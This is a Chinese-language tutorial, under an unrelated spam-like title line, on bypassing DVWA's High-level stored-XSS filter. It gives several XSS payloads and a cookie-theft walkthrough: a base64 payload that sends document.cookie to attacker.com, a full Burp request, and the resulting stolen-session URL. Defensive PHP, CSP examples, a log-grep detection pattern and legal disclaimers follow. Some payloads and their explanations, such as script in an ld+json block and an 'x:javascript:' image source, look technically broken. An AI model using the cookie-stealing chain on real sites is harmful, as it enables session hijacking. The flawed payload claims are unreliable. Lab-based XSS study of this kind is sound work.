高安網(wǎng)站制作一元手游平臺(tái)app
本文僅用于技術(shù)研究,禁止用于非法用途。
Author:枷鎖
文章目錄
- High級(jí)別防護(hù)機(jī)制深度分析
- High級(jí)別繞過(guò)策略(四種高級(jí)技巧)
- 技巧1:SVG + Unicode編碼繞過(guò)
- 技巧2:動(dòng)態(tài)腳本創(chuàng)建(DOM操作)
- 技巧3:HTML5特性濫用
- 技巧4:跨協(xié)議重定向攻擊
- 實(shí)戰(zhàn)思路:Cookie竊取(繞過(guò)High防護(hù))
- 步驟1:構(gòu)造高級(jí)Payload
- 步驟2:Base64解碼內(nèi)容
- 步驟3:Burp Suite發(fā)送請(qǐng)求
- 步驟4:驗(yàn)證攻擊效果
- 終極防御方案(Impossible級(jí)別)
- 完整防御代碼示例
- 防御機(jī)制對(duì)比表
- 瀏覽器安全機(jī)制演進(jìn)
- 企業(yè)級(jí)最佳實(shí)踐
- 法律合規(guī)提醒
本文環(huán)境Security Level:High
High級(jí)別防護(hù)機(jī)制深度分析
從截圖可見(jiàn)安全級(jí)別為High,但我們將聚焦High級(jí)別的防御策略:
// 對(duì)$message的過(guò)濾:
$message = strip_tags(addslashes($message)); // 刪除HTML標(biāo)簽 + 轉(zhuǎn)義特殊字符
$message = mysqli_real_escape_string($message); // 數(shù)據(jù)庫(kù)轉(zhuǎn)義
$message = htmlspecialchars($message); // 轉(zhuǎn)換為HTML實(shí)體// 對(duì)$name的過(guò)濾:
$name = preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name); // 刪除<script>標(biāo)簽
$name = mysqli_real_escape_string($name); // 數(shù)據(jù)庫(kù)轉(zhuǎn)義
High級(jí)別防護(hù)特點(diǎn):
High級(jí)別繞過(guò)策略(四種高級(jí)技巧)
技巧1:SVG + Unicode編碼繞過(guò)
name:
<svg><image href="data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='al\u0065rt(1)'%3E%3C/svg%3E">
</svg>
? 原理:Unicode編碼\u0065繞過(guò)HTML實(shí)體檢測(cè)
name字段字?jǐn)?shù)限定繞過(guò)技巧:
1、按F12
2、鼠標(biāo)選中元素
修改最長(zhǎng)限制max,即可繞過(guò)限制
技巧2:動(dòng)態(tài)腳本創(chuàng)建(DOM操作)
Message:
<img src="" id="payload">
<script type="application/ld+json">window.onload = function() {document.getElementById("payload").src = "x:javascript:alert(document.domain)";}
</script>
? 原理:使用合法JSON格式繞過(guò)檢測(cè)
技巧3:HTML5特性濫用
Name:
<details ontoggle="alert(1)" open><summary style=display:none>XSS</summary>
</details>
? 瀏覽器支持:Chrome/Firefox最新版
技巧4:跨協(xié)議重定向攻擊
Message:
<iframe srcdoc="<script>location='javascript:alert(document.cookie)'</script>">
</iframe>
? 觸發(fā)條件:用戶點(diǎn)擊任何頁(yè)面元素后
實(shí)戰(zhàn)思路:Cookie竊取(繞過(guò)High防護(hù))
步驟1:構(gòu)造高級(jí)Payload
Message:
<object data="data:text/html;base64,PHNjcmlwdD5mZXRjaCgnaHR0cDovL2F0dGFja2VyLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2llKTwvc2NyaXB0Pg=="></object>
步驟2:Base64解碼內(nèi)容
// 解碼后:
<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>
步驟3:Burp Suite發(fā)送請(qǐng)求
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: dvwa.test
Content-Type: application/x-www-form-urlencoded
Cookie: security=high; PHPSESSID=...txtName=NormalUser&
mtxMessage=%3Cobject%20data%3D%22data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5mZXRjaCgnaHR0cDovL2F0dGFja2VyLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2llKTwvc2NyaXB0Pg%3D%3D%22%3E%3C%2Fobject%3E&
btnSign=Sign+Guestbook
步驟4:驗(yàn)證攻擊效果
當(dāng)用戶訪問(wèn)留言板時(shí),Cookie將自動(dòng)發(fā)送到攻擊者服務(wù)器:
http://attacker.com/steal?c=PHPSESSID=e84dfb48e8b0d9;security=high
終極防御方案(Impossible級(jí)別)
完整防御代碼示例
// 1. 輸入驗(yàn)證(白名單)
if (!preg_match('/^[a-zA-Z0-9\s.,!?]{1,30}$/', $name)) {die("非法姓名格式");
}// 2. 輸出編碼
function xssafe($data) {return htmlspecialchars($data, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}// 3. 預(yù)處理語(yǔ)句
$stmt = $db->prepare("INSERT INTO guestbook (name, comment) VALUES (?, ?)");
$stmt->bindParam(1, $name, PDO::PARAM_STR);
$stmt->bindParam(2, $message, PDO::PARAM_STR);// 4. CSP策略頭
header("Content-Security-Policy: default-src 'self'; script-src 'nonce-r4nd0m123'");
防御機(jī)制對(duì)比表
瀏覽器安全機(jī)制演進(jìn)
graph TDA[2010年:基本過(guò)濾] --> B[2015年:XSS Auditor]B --> C[2018年:現(xiàn)代CSP策略]C --> D[2020年:Trusted Types]D --> E[2023年:WASM沙箱]E --> F[未來(lái):AI實(shí)時(shí)行為檢測(cè)]classDef new fill:#9f9,stroke:#333;class C,D,E,F new;
企業(yè)級(jí)最佳實(shí)踐
- 輸入處理策略
// 現(xiàn)代框架示例(React)
function SafeInput({value}) {return <div>{value}</div>; // 自動(dòng)轉(zhuǎn)義輸出
}
- CSP配置示例
Content-Security-Policy:
default-src 'none';
script-src 'self' 'nonce-r4nd0m123';
style-src 'self' fonts.googleapis.com;
font-src fonts.gstatic.com;
connect-src 'self';
- 監(jiān)控與響應(yīng)
# 實(shí)時(shí)監(jiān)控XSS嘗試
tail -f /var/log/nginx/xss_attempts.log | grep -E '<script|javascript:'
法律合規(guī)提醒
根據(jù)《網(wǎng)絡(luò)安全法》第27條:
任何個(gè)人和組織不得從事非法侵入他人網(wǎng)絡(luò)、干擾他人網(wǎng)絡(luò)正常功能、竊取網(wǎng)絡(luò)數(shù)據(jù)等危害網(wǎng)絡(luò)安全的活動(dòng)
安全測(cè)試黃金法則:
- 未經(jīng)授權(quán)測(cè)試 = 違法行為
+ 授權(quán)測(cè)試 + 詳細(xì)報(bào)告 = 合法安全研究
下一專題:《DVWA系列——CSP繞過(guò)與新型XSS攻擊技術(shù)》將探討:
- 如何繞過(guò)嚴(yán)格CSP策略
- Web Worker中的XSS攻擊
- Service Worker持久化攻擊
- WASM內(nèi)存操作漏洞利用
宇宙級(jí)免責(zé)聲明??
🚨 重要聲明:本文僅供合法授權(quán)下的安全研究與教育目的!🚨
1.合法授權(quán):本文所述技術(shù)僅適用于已獲得明確書(shū)面授權(quán)的目標(biāo)或自己的靶場(chǎng)內(nèi)系統(tǒng)。未經(jīng)授權(quán)的滲透測(cè)試、漏洞掃描或暴力破解行為均屬違法,可能導(dǎo)致法律后果(包括但不限于刑事指控、民事訴訟及巨額賠償)。
2.道德約束:黑客精神的核心是建設(shè)而非破壞。請(qǐng)確保你的行為符合道德規(guī)范,僅用于提升系統(tǒng)安全性,而非惡意入侵、數(shù)據(jù)竊取或服務(wù)干擾。
3.風(fēng)險(xiǎn)自擔(dān):使用本文所述工具和技術(shù)時(shí),你需自行承擔(dān)所有風(fēng)險(xiǎn)。作者及發(fā)布平臺(tái)不對(duì)任何濫用、誤用或由此引發(fā)的法律問(wèn)題負(fù)責(zé)。
4.合規(guī)性:確保你的測(cè)試符合當(dāng)?shù)丶皣?guó)際法律法規(guī)(如《計(jì)算機(jī)欺詐與濫用法案》(CFAA)、《通用數(shù)據(jù)保護(hù)條例》(GDPR)等)。必要時(shí),咨詢法律顧問(wèn)。
5.最小影響原則:測(cè)試過(guò)程中應(yīng)避免對(duì)目標(biāo)系統(tǒng)造成破壞或服務(wù)中斷。建議在非生產(chǎn)環(huán)境或沙箱環(huán)境中進(jìn)行演練。
6.數(shù)據(jù)保護(hù):不得訪問(wèn)、存儲(chǔ)或泄露任何未授權(quán)的用戶數(shù)據(jù)。如意外獲取敏感信息,應(yīng)立即報(bào)告相關(guān)方并刪除。
7.免責(zé)范圍:作者、平臺(tái)及關(guān)聯(lián)方明確拒絕承擔(dān)因讀者行為導(dǎo)致的任何直接、間接、附帶或懲罰性損害責(zé)任。
🔐 安全研究的正確姿勢(shì):
? 先授權(quán),再測(cè)試
? 只針對(duì)自己擁有或有權(quán)測(cè)試的系統(tǒng)
? 發(fā)現(xiàn)漏洞后,及時(shí)報(bào)告并協(xié)助修復(fù)
? 尊重隱私,不越界
?? 警告:技術(shù)無(wú)善惡,人心有黑白。請(qǐng)明智選擇你的道路。
希望這個(gè)教程對(duì)你有所幫助!記得負(fù)責(zé)任地進(jìn)行安全測(cè)試。